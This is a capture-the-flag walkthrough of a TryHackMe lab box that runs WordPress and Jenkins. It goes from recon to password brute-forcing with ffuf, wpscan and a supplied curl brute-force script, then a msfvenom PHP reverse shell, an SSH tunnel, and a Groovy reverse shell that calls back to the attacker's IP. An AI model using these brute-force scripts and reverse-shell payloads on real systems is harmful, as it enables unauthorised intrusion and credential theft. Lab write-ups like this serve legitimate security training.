Attacking IP

10.17.34.202

Target IP

10.10.109.1

Recon

Nmap:

nmap -A -T3 -oN nmap.txt 10.10.109.1

Output:

# Nmap 7.94SVN scan initiated Sat Dec  9 17:07:57 2023 as: nmap -A -T3 -oN nmap.txt 10.10.109.1
Nmap scan report for 10.10.109.1
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  9 17:08:48 2023 -- 1 IP address (1 host up) scanned in 50.80 seconds

Gobuster:

gobuster dir -u http://10.10.109.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Output:

/wordpress            (Status: 301) [Size: 314] [--> http://10.10.109.1/wordpress/]
/blog                 (Status: 301) [Size: 309] [--> http://10.10.109.1/blog/]
/javascript           (Status: 301) [Size: 315] [--> http://10.10.109.1/javascript/]
/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.109.1/phpmyadmin/]

The /blog site renders without its styling, and the room tells us that:

Quote

Ensure that you modify your hosts file to reflect internal.thm

So we add an entry to /etc/hosts to reflect internal.thm with the target IP:

10.10.109.1 internal.thm

With that entry in place the site renders properly (🤔).

Scan with WPScan:

wpscan --url http://10.10.109.1/blog -e vp,u

With:

  • --url: the URL to scan
  • -e: enumerate
    • vp: vulnerable plugins
    • u: user IDs range (default: 1-10)

Output:

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 
[i] User(s) Identified:
 
[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Brute Force

Try to brute force admin's password with ffuf1. wp-login.php expects the form fields log and pwd (not username/password), and it answers every failed attempt with HTTP 200 and the form again, so match on the 302 redirect that only a successful login produces:

ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "log=admin&pwd=FUZZ&wp-submit=Log+In" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.109.1/blog/wp-login.php -mc 302

We can also use wpscan:

wpscan --url http://10.10.109.1/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads 100

The password turns up quickly:

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

After logging in we get an “Administration email verification” prompt, which reveals the admin email: admin@internal.thm

In the Posts section there is a private post (/blog/wp-admin/post.php?post=5) with this content:

Quote

Don’t forget to reset Will’s credentials. william:arnold147

Looks like a credential 🤦‍♀️. But it is a rabbit hole 😱 (according to the room's author).

Reverse Shell

On WordPress we can use the “Theme Editor” feature and edit the first theme (“Twenty Seventeen”) to plant a reverse shell2.

Generate the PHP payload with msfvenom:

msfvenom -p php/meterpreter_reverse_tcp LHOST=tun0 LPORT=9999 -f raw > rev_shell.php

Edit the 404 template (404.php) and replace its whole content with the generated script.

Start a handler for the meterpreter session (a payload module cannot be run with exploit on its own; the listener is exploit/multi/handler with the payload set to match msfvenom):

msfconsole -q -x 'use exploit/multi/handler; set payload php/meterpreter_reverse_tcp; set LHOST tun0; set LPORT 9999; run'

Access this URL and we will get the reverse shell:

http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php

Note that the theme's directory name is twentyseventeen; it appears in the URL when you click the theme's “Customize” button.

Aubreanna

After receiving the reverse shell, trying to enter /home/aubreanna fails: the shell runs as www-data (check with meterpreter's getuid command), and that user has no access to her home directory.

Search for text files with meterpreter:

search -f *.txt

Find some interesting files:

  • /boot/grub/gfxblacklist.txt
  • /opt/wp-save.txt
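The same loot hunt from a plain shell, as an added example that is not part of the original write-up (useful when you have dropped to a shell and meterpreter's search is not at hand). GNU find's -readable keeps only files the current user can actually open, so directories like /home/aubreanna that www-data cannot enter are skipped instead of producing errors, and the noisiest system trees are pruned. The prune list is an assumption; extend it for the box at hand.

```shell
#!/bin/sh
# Added example, not from the write-up: hunt for readable .txt files from a
# plain shell. GNU find's -readable keeps only files the current user
# (www-data here) can open; the prune list below is an assumption.

find_readable_txt() {   # $1 = directory to search, defaults to /
  root="${1:-/}"
  base="${root%/}"      # "" for /, so the prune paths become /proc, /sys, ...
  find "$root" \( -path "$base/proc" -o -path "$base/sys" -o -path "$base/usr" \
                  -o -path "$base/boot" -o -path "$base/var/lib" \) -prune -o \
       -type f -name '*.txt' -readable -print 2>/dev/null
}

# Show why a directory hop failed: both r and x are needed to list and enter it.
dir_access() {   # $1 = directory; prints mode/owner, returns 1 if not traversable
  ls -ld "$1"
  [ -r "$1" ] && [ -x "$1" ]
}

# Usage:
# find_readable_txt /          # on the box this turns up /opt/wp-save.txt
# dir_access /home/aubreanna   # prints the mode that keeps www-data out
```

Run it as the user you landed as; the output is the list of files that user can read, which is what matters for the next pivot, not what exists on disk.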

Content of wp-save:

Bill,
 
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
 
aubreanna:bubb13guM!@#123

Use this to log in as user aubreanna through SSH:

ssh aubreanna@internal.thm

After logging in, read user.txt to get the flag:

Success

THM{int3rna1_fl4g_1}

Jenkins

We also find a file named jenkins.txt that reveals a Jenkins endpoint: http://172.17.0.2:8080/. As the room's author notes, 172.17.0.x is the default Docker bridge network, so this is most likely a container on the target that is not reachable from outside (which is why the nmap scan showed no port 8080).

Use SSH tunneling3 to reach the Jenkins service:

ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm

Local port 8080 is now forwarded through the SSH session to 172.17.0.2:8080 on the target side. Open http://localhost:8080 in a browser and we get the Jenkins login page.

Brute force the Jenkins login with Burp Suite Intruder using the first 500 passwords from rockyou.txt; the author picks Burp over ffuf here so the response headers of each attempt can be inspected.

Look for the one response that carries a session cookie:

Set-Cookie: JSESSIONID.bb2720fc=node019otbsjxrec5d1ko5l17b7tedl22478.node0

Only the successful login gets a fresh session, and that response is also the smallest in the list, so its payload (spongebob) is probably the password. Trying it confirms it works.
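Both brute-force steps on this page (the WordPress login above and the Jenkins login here) come down to the same thing: post one candidate per request and decide success from the status line and headers, not from a 200 match. The following curl-based script is an added example, not code from the write-up or from the room's author. The URLs, form field names and the Jenkins login path are assumptions taken from the write-up's commands and from how stock WordPress and Jenkins login forms behave; they were not verified against the box.

```shell
#!/bin/sh
# Added example, not from the original write-up: a curl-based login
# brute-forcer that classifies each attempt by status line and headers.
# wp-login.php returns 200 on every failed login, so matching 200 is useless.
# URLs, field names and the Jenkins login path are assumptions.

WP_LOGIN="http://internal.thm/blog/wp-login.php"
JENKINS_LOGIN="http://127.0.0.1:8080/j_acegi_security_check"  # through the SSH tunnel

# WordPress: failure re-renders the form with 200; success answers 302 to
# wp-admin/ and sets a wordpress_logged_in_<hash> cookie.
wp_login_ok() {   # $1 = raw response headers, status line first
  printf '%s\n' "$1" | head -n 1 | grep -q ' 302 ' &&
    printf '%s\n' "$1" | grep -qi '^Set-Cookie: wordpress_logged_in_'
}

# Jenkins: failure and success are both 302; failure redirects to /loginError,
# success redirects elsewhere and issues a fresh JSESSIONID (the header the
# Burp Intruder run above was spotted by).
jenkins_login_ok() {
  printf '%s\n' "$1" | head -n 1 | grep -q ' 302 ' &&
    ! printf '%s\n' "$1" | grep -qi '^Location: .*loginError' &&
    printf '%s\n' "$1" | grep -qi '^Set-Cookie: JSESSIONID'
}

# POST one attempt without following redirects; print status line + headers only.
# --data-urlencode keeps passwords containing & or % intact.
post_headers() {   # $1 = url, $2 = fixed form data, $3 = password field, $4 = password
  curl -s -o /dev/null -D - --data "$2" --data-urlencode "$3=$4" "$1"
}

# Walk a wordlist until the classifier accepts a response; print the hit.
brute() {   # $1 url  $2 fixed data  $3 password field  $4 classifier  $5 wordlist
  while IFS= read -r pw; do
    hdrs=$(post_headers "$1" "$2" "$3" "$pw") || continue
    if "$4" "$hdrs"; then
      printf 'valid: %s\n' "$pw"
      return 0
    fi
  done < "$5"
  return 1
}

# Usage (commented out so the file can be sourced for its functions):
# brute "$WP_LOGIN" "log=admin&wp-submit=Log+In" pwd wp_login_ok /usr/share/wordlists/rockyou.txt
# head -n 500 /usr/share/wordlists/rockyou.txt > top500.txt
# brute "$JENKINS_LOGIN" "j_username=admin&from=%2F&Submit=Sign+in" j_password jenkins_login_ok top500.txt
```

The classifier is the part worth keeping: when a new target behaves differently, capture one failed and one successful login by hand, diff the headers, and encode that difference rather than guessing at status codes or response sizes.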

Use the “Script Console” under “Manage Jenkins” to spawn a reverse shell in Groovy. The script (the well-known Java/Groovy reverse-shell one-liner, laid out for readability):

String host = "10.17.34.202";   // attacking IP
int port = 9999;
String cmd = "/bin/bash";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Pump bytes between the shell process and the socket until either side closes
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Run the script and a reverse shell comes back (start a netcat listener on port 9999 first). Note that this shell lands inside the Jenkins container, not on the host.

In the container's /opt folder there is a file named note.txt with this content:

Aubreanna,
 
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you need access to the root user account.
 
root:tr0ub13guM!@#123

And we found the root password 🤷‍♀️.

Log in, read root.txt and we have the flag:

Success

THM{d0ck3r_d3str0y3r}


Resources

Footnotes

  1. refer to TryHackMe - Authentication Bypass

  2. refer to Introduction to Shells

  3. refer to Tunneling